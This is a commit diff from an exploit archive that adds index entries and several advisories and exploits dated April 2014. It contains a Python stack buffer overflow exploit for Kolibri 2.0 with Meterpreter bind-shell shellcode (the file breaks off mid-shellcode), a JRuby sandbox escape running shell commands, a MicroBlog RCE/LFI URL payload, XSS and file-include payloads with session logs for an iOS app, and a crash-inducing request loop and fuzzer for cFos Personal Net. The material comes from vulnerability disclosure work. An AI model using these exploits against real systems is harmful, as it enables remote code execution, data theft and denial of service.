Updated 04_27_2014

2014-04-27 04:36:25 +00:00 · 2014-04-27 04:36:25 +00:00 · a6e2fc1461
commit a6e2fc1461
parent 7edc578504
8 changed files with 669 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -29760,8 +29760,15 @@ id,file,description,date,author,platform,type,port
 33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0
 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0
 33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0
+33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability",2009-05-29,"Saint Patrick",linux,dos,0
+33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0
 33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0
 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0
 33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0
+33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure Vulnerability",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0
 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0
+33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0
+33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
+33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
+33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,"jiko jawad",php,webapps,0
--- a/platforms/ios/webapps/33026.txt
+++ b/platforms/ios/webapps/33026.txt
@ -0,0 +1,319 @@
+Document Title:
+===============
+Depot WiFi v1.0.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1259
+
+
+Release Date:
+=============
+2014-04-23
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1259
+
+
+Common Vulnerability Scoring System:
+====================================
+8.6
+
+
+Product & Service Introduction:
+===============================
+With Depot you can archive all kinds of files on your iPhone, iPod or iPad and then share them on a local WiFi network
+In Depot not only you can receive files from other applications that supports document interaction (as Mail or Safari), 
+but you can also download and upload files from any kind of PC and internet enabled devices. You can then open your files 
+directly on your device or share them between other devices such as smartphones, tablets, PCs, game consoles and smart TVs 
+connected through a local WiFi.
+
+(Copy of the Homepage: https://itunes.apple.com/br/app/depot/id858248612 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Depot v1.0.0 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-04-23:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Maurizio Berioli
+Product: Depot - iOS Mobile Application 1.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file include web vulnerability has been discovered in the official Depot v1.0.0 iOS mobile web-application. The local file include 
+web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise 
+the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `+Files > Upload!` module. Remote attackers are able to inject own files with 
+malicious `filename` values in the `Upload!` POST method request to compromise the mobile web-application. The local file/path include execution 
+occurs in the `Depot index item list` context of the wifi interface. Attackers are able to inject own local file requests by usage of the `wifi interface`
+path value or by a local privileged device user account via `filename sync` rename.
+
+Remote attackers are also able to exploit the filename validation issue in combination with persistent script codes to execute different local malicious 
+attacks or requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security risk of the 
+local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
+
+Exploitation of the local file include web vulnerability requires no privileged application user account or user interaction. Successful exploitation of 
+the local file include web vulnerability results in mobile application or connected device component compromise.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] +File > Upload!
+
+Vulnerable Function(s):
+				[+] Create a new Folder (remote)
+				[+] rename (local sync)
+
+Vulnerable Parameter(s):
+				[+] filename (path value)
+
+Affected Module(s):
+				[+] Depot Index Item Listing (http://localhost/)
+
+
+
+
+1.2
+A code execution web vulnerability has been discovered in the official Depot v1.0.0 iOS mobile web-application. The issue allows an attacker to 
+compromise the application and connected device components by exploitation of system specific code execution vulnerability in the webdisk interface.
+
+The vulnerability is located in the GET method request of the `+Folders` module. The main index provides a folders add form which is not secure 
+encoding the regular inputs. The context can be implemented to the folders form and the results is the application-side execution of system 
+specific malicious codes in the index. The file itself will not be transfered and the input generates the listing context to the index.
+
+The input field of the +Folders module executes the wrong encoded input via GET method request by the name value. Remote attackers are able to 
+execute the own malicious codes by usage of a script code payload in combination with the affected system device values. The execution of the code 
+occurs in the main depot file dir listing context. The attack vector is on application-side and the request method to attack the service is GET. 
+The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9.
+
+Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction. 
+Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
+
+
+Request Method(s):
+				[+] POST
+
+Vulnerable Module(s):
+				[+] +Folders
+
+Vulnerable Function(s):
+				[+] Create a new Folder (remote)
+				[+] rename (local sync)
+
+Vulnerable Parameter(s):
+				[+] foldername
+
+Affected Module(s):
+				[+] Depot Index Item Listing (http://localhost/)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Exploit Filename Index
+
+<input onclick="toggle(this);" type="checkbox"></div></td><td><div style="border:1px solid;text-align:center;background-color:DCF0DC;">
+<a href="/?ORD=1">Name</a></div></td><td><div style="border:1px solid;text-align:center;background-color:DCF0DC;"><a href="/?ORD=2">Date</a></div></td>
+<td colspan="2"><div style="border:1px solid;text-align:center;background-color:DCF0DC;"><a href="/?ORD=4">Size</a></div></td></tr>
+<tr style="background-color:#F0F0F0"><td><input name="file" value="./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png" type="checkbox"></td>
+<td><a href="/./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png">./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png</a></td>
+<td>    22.04.2014 11:37  </td><td style="text-align:right;">538.00</td><td>bytes</td>
+
+
+--- POC SESSION LOGS [POST] ---
+Status: 200[OK]
+GET http://localhost:80/?addfile=1 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[2924] Mime Type[text/html]
+   Request Header:
+      Host[localhost:80]
+      User-Agent[Mozilla/5.0 (Windows NT 
+
+6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer
+
+[http://localhost:80/]
+      Connection[keep-alive]
+   Response Header:
+      Content-Type[text/html]
+      Content-Length[2924]
+      Connection[close]
+      Cache-Control[no-cache]
+
+
+Status: 200[OK]
+POST http://localhost:80/ Load Flags
+
+[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[2920] Mime Type[text/html]
+   Request Header:
+      Host[localhost:80]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:80/?addfile=1]
+      Connection[keep-alive]
+   POST-
+
+Daten:
+      POST_DATA[-----------------------------2914547563213
+Content-Disposition: form-data; name="mauber"; filename="./var/x/[LOCAL FILE INCLUDE VULNERABILITY].test.png"
+Content-Type: image/png
+
+
+Reference(s):
+http://localhost:80/?addfile=
+
+
+
+1.2
+The code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+PoC #1: Exploit Index Foldername Item
+
+<div style="border:1px solid;text-align:center;background-color:F0F0FF;">Folders [<a href="/?adddir=1">+</a>]<br>>"%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C" <="" created!<="" div=""></td></tr><tr><td><div style='border:1px 
+
+solid;text-align:center;background-color:DCDCF0;'> </div></td><td><div style='border:1px solid;text-align:center;background-color:DCDCF0;'><a href='/?ORD=1'>Name</a></div></td><td colspan='3'><div style='border:1px solid;text-
+
+align:center;background-color:DCDCF0;'><a href='/?ORD=2'>Date</a></div></td></tr><tr style='background-color:#F0F0F0'><td> </td><td>[<a href='.deviceMedia.'>.deviceMedia.</a>]</td><td colspan='3'>    -
+
+  </td></tr><tr style='background-color:#FFFFFF'><td> </td><td>[<a href='/%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C'>%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C) <</a>]</td>
+
+
+PoC #2: Exploit #2 Directory/Path Value
+
+<td><a href="/"><<</a> Browsing:<b>[<a href="/">/</a>][<a href="/>"<%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C) <">>"<%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C)" <<="" a="">]</b>
+<br> </td></tr><tr><td><table align='center' style='border-style:none;border-spacing:0'><tr><td colspan='5'><div style='border:1px solid;text-align:center;background-color:F0F0FF;'>
+Folders [<a href='/>"<iframe src=a onload=alert(document.cookie) <?adddir=1'>+</a>]</div></td></tr><tr><td colspan='4' style='text-align: center;'>No sub-folders presents.</td></tr>
+<tr><td colspan='5'> </td></tr><tr><td colspan='5'><div style='border:1px solid;text-align:center;background-color:F0FFF0;'>Files [<a href='/%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C) <?addfile=1'>
+</a>]</div></td></tr><tr><td colspan='4' style='text-align: center;'>No files present.</td></tr></table></td></tr></table></body></html></iframe></a></b></td>
+
+
+--- POC SESSION LOGS [GET] ---
+
+GET http://localhost:80/.createdir?newdir=%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C Load Flags[LOAD_FROM_CACHE  ] Gr??e des Inhalts[-1] Mime Type[unbekannt]
+   Request Header:
+      Host[localhost:80]
+      User-Agent[Mozilla/5.0 
+
+(Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer
+
+[http://localhost:80/?adddir=1]
+   Response Header:
+
+
+11:15:44.105[31ms][total 31ms] Status: 200[OK]
+GET http://localhost:80/%3E%22%3C.[CODE EXECUTION VULNERABILITY!]+%3C Load Flags[LOAD_DOCUMENT_URI  ] Gr??e des Inhalts[48] Mime Type
+
+[text/html]
+   Request Header:
+      Host[localhost:80]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-
+
+Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:80/]
+      Connection[keep-alive]
+   Response Header:
+      Content-Type[text/html]
+      Content-Length[48]
+      Connection[close]
+Cache-Control[no-cache]
+
+
+
+Reference(s):
+http://localhost:80/.createdir?newdir=
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local file include web vulnerability is estimated as high.
+
+1.2
+The security risk of the code execution web vulnerability is estimated as high(+).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
--- a/platforms/linux/dos/33017.txt
+++ b/platforms/linux/dos/33017.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/35148/info
+
+Adobe Acrobat is prone to a denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to cause the affected application to crash, effectively denying service. Attackers may also be able to execute arbitrary code, but this has not been confirmed.
+
+Acrobat 9.1.1 is vulnerable; other versions may also be affected.
+
+NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. 
+
+http://www.exploit-db.com/sploits/33017.pdf
--- a/platforms/linux/local/33028.txt
+++ b/platforms/linux/local/33028.txt
@ -0,0 +1,51 @@
+Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>
+
+[ Authors ]
+        joernchen       <joernchen () phenoelit de>
+
+        Phenoelit Group (http://www.phenoelit.de)
+
+[ Affected Products ]
+        jruby-sandbox <= 0.2.2
+        https://github.com/omghax/jruby-sandbox
+
+[ Vendor communication ]
+        2014-04-22 Send vulnerability details to project maintainer
+        2014-04-24 Requesting confirmation that details were received
+        2014-04-24 Maintainer states he is working on a test case
+        2014-04-24 Maintainer releases fixed version
+        2014-04-24 Release of this advisory
+
+[ Description ]
+        jruby-sandbox aims to allow safe execution of user given Ruby
+        code within a JRuby [0] runtime. However via import of Java 
+        classes it is possible to circumvent those protections and 
+        execute arbitrary code outside the sandboxed environment.
+
+[ Example ]
+
+require 'sandbox'
+sand = Sandbox.safe
+sand.activate!
+
+begin
+  sand.eval("print `id`")
+rescue Exception => e
+  puts "fail via Ruby ;)"
+end
+puts "Now for some Java"
+
+sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
+sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
+sand.eval("s = Java::java.util.Scanner.new( " + 
+          "Java::java.lang.ProcessBuilder.new('sh','-c','id')" + 
+          ".start.getInputStream  ).useDelimiter(\"\x00\").next")
+sand.eval("print s")
+
+[ Solution ]
+        Upgrade to version 0.2.3
+
+[ References ]
+        [0] http://jruby.org/
+
+[ end of file ]
--- a/platforms/php/webapps/33030.txt
+++ b/platforms/php/webapps/33030.txt
@ -0,0 +1,34 @@
+----------[exploit Debut]
+[Multiple Vulnerability]
+----------[Script Info]
+ 
+Moi : JIKO
+Site    : No-exploit.Com
+
+ 
+----------[Script Info]
+ 
+Site        : http://www.apphp.com
+Download    : http://www.apphp.com/downloads_free/php_microblog_101.zip
+ 
+----------[exploit Info]
+ 
+~[RCE]
+http://path/index.php?jiko);system((dir)=/
+~[LFI]
+http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)
+http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)
+
+if (($page != "") && file_exists("page/" . $page . ".php")) {
+                        include_once("page/" . $page . 
+
+".php");
+                    } else if (($admin != "") && 
+
+file_exists("admin/" . $admin . ".php")) {
+                        include_once("admin/" . $admin 
+
+. ".php");
+                    } 
+----------[exploit Fin]
+ 		 	   		  
--- a/platforms/windows/dos/33018.txt
+++ b/platforms/windows/dos/33018.txt
@ -0,0 +1,163 @@
+?cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service
+
+
+Vendor: cFos Software GmbH
+Product web page: https://www.cfos.de
+Affected version: 3.09
+
+Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for
+personal and professional use. For personal use, instead of hosting websites
+with a webhoster, you just run it on your Windows machine. For professional
+use, you rent a virtual windows PC or dedicated PC from a webhoster and run
+it there.
+
+Desc: cFos Personal Net web server is vulnerable to a remote denial of service
+issue when processing multiple malformed POST requests in less than 3000ms.
+The issue occurs when the application fails to handle the data sent in the
+POST requests in a single socket connection causing heap memory corruption
+which results in a crash of the HTTP service.
+
+SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0
+
+============================================================================
+
+(658.1448): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe
+eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88
+eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+cfospnet+0x54529:
+00914529 ff5004          call    dword ptr [eax+4]    ds:002b:feeefef2=????????
+0:024> d ecx
+02813dcc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813ddc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813dec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813dfc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e0c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e1c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e2c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e3c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0:024> d
+02813e4c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e5c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e6c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e7c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e8c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813e9c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813eac  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813ebc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0:024> d
+02813ecc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813edc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813eec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813efc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813f0c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813f1c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813f2c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813f3c  ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21  .............f.!
+0:024> d
+02813f4c  8e e8 06 18 d0 71 2d 04-c0 f8 80 02 d0 71 2d 04  .....q-......q-.
+02813f5c  01 00 ad ba 5f 43 46 50-4e 45 54 5f 50 41 54 48  ...._CFPNET_PATH
+02813f6c  00 f0 ad ba 0c 00 00 00-0f 00 00 00 90 41 2c 04  .............A,.
+02813f7c  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 29 00 00 00  ............)...
+02813f8c  2f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  /...............
+02813f9c  00 00 00 00 aa 66 9a 38-dc e8 06 00 10 31 2c 04  .....f.8.....1,.
+02813fac  d0 0c 81 02 ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813fbc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0:024> d
+02813fcc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813fdc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813fec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+02813ffc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281400c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281401c  ee fe ee fe ee fe ee fe-ee fe ee fe be 66 99 2f  .............f./
+0281402c  c6 e8 06 18 0a 00 00 00-6e 00 61 00 6d 00 65 00  ........n.a.m.e.
+0281403c  3d 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  =...............
+0:024> d
+0281404c  00 00 00 00 b0 66 9a 22-d2 e8 06 00 60 8b 80 02  .....f."....`...
+0281405c  10 c9 2b 04 ee fe ee fe-ee fe ee fe ee fe ee fe  ..+.............
+0281406c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281407c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281408c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281409c  ee fe ee fe ee fe ee fe-ee fe ee fe b0 66 99 21  .............f.!
+028140ac  dc e8 06 18 e8 08 81 02-30 37 86 02 c0 4b 81 02  ........07...K..
+028140bc  00 00 ad ba 52 45 51 55-45 53 54 5f 55 52 49 00  ....REQUEST_URI.
+0:024> d
+028140cc  0d f0 ad ba 0b 00 00 00-0f 00 00 00 08 41 81 02  .............A..
+028140dc  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 1d 00 00 00  ................
+028140ec  1f 00 00 00 ab ab ab ab-ab ab ab ab 00 00 00 00  ................
+028140fc  00 00 00 00 bc 66 99 2d-dc e8 06 18 2f 73 63 72  .....f.-..../scr
+0281410c  69 70 74 73 2f 67 65 74-5f 73 65 72 76 65 72 5f  ipts/get_server_
+0281411c  73 74 61 74 73 2e 6a 73-73 00 ad ba ab ab ab ab  stats.jss.......
+0281412c  ab ab ab ab 00 00 00 00-00 00 00 00 ad 66 9a 3f  .............f.?
+0281413c  d0 e8 06 00 c8 4a 2c 04-f0 18 2d 04 ee fe ee fe  .....J,...-.....
+0:024> d
+0281414c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281415c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281416c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281417c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281418c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0281419c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+028141ac  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+028141bc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
+0:024> d esi
+028198b0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+028198c0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+028198d0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+028198e0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+028198f0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+02819900  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+02819910  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+02819920  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
+
+============================================================================
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2014-5184
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php
+
+
+01.04.2014
+
+---
+
+
+-ALGjlang
+
+ open_socket(); for(j=1;j<=30;j++)
+ {
+ send_socket("
+ POST /scripts/get_server_stats.jss?name= HTTP/1.1
+ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
+ Accept: */*
+ Host: 192.168.0.107
+ Content-Length: 20
+
+ AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a
+ ") } close_socket();
+
+
+-SPKfzz
+
+ s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n");
+ s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n");
+ s_string("Accept: */*");
+ s_string("Host: 192.168.0.107\r\n");
+ s_string("Content-Length: ");
+ s_blocksize_string("fuzz",15);
+ s_string("\r\n\r\n");
+
+ s_block_start("fuzz");
+ s_string("joxypoxyjoxypoxy!!\r\n\" * 100);
+ s_string_variable("ZSL");
+ s_string("\r\n"); //importante
+ s_block_end("fuzz");
--- a/platforms/windows/remote/33024.txt
+++ b/platforms/windows/remote/33024.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/35200/info
+
+Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to properly enforce the same-origin policy.
+
+An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks.
+
+http://www.exploit-db.com/sploits/33024.zip
--- a/platforms/windows/remote/33027.py
+++ b/platforms/windows/remote/33027.py
@ -0,0 +1,77 @@
+#!/usr/bin/python 
+# Exploit Title: Kolibri GET request Stack buffer Overflow 
+# Date: 25 April 2014
+# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
+# Vendor Homepage: http://www.senkas.com/kolibri/download.php
+# Version: Kolibri 2.0 
+# Tested on: Windows XP SP3,  Spanish
+# Thanks:To my wife for putting up with my possessions
+# Description: 
+# A buffer overflow is triggered when a long GET command is sent to the server.
+
+import socket, sys, os, time 
+
+if len(sys.argv) != 3:
+	print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
+        print "[*] Exploit created by Polunchis"
+        print "[*] https://www.intrusionlabs.com.mx"
+	sys.exit(0)
+host = sys.argv[1]         
+port = int(sys.argv[2])
+ 
+#./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
+shellcode = (
+"\x29\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
+"\xaa\x86\x33\x5f\x83\xee\xfc\xe2\xf4\x56\x6e\xba\x5f\xaa\x86"
+"\x53\xd6\x4f\xb7\xe1\x3b\x21\xd4\x03\xd4\xf8\x8a\xb8\x0d\xbe"
+"\x0d\x41\x77\xa5\x31\x79\x79\x9b\x79\x02\x9f\x06\xba\x52\x23"
+"\xa8\xaa\x13\x9e\x65\x8b\x32\x98\x48\x76\x61\x08\x21\xd4\x23"
+"\xd4\xe8\xba\x32\x8f\x21\xc6\x4b\xda\x6a\xf2\x79\x5e\x7a\xd6"
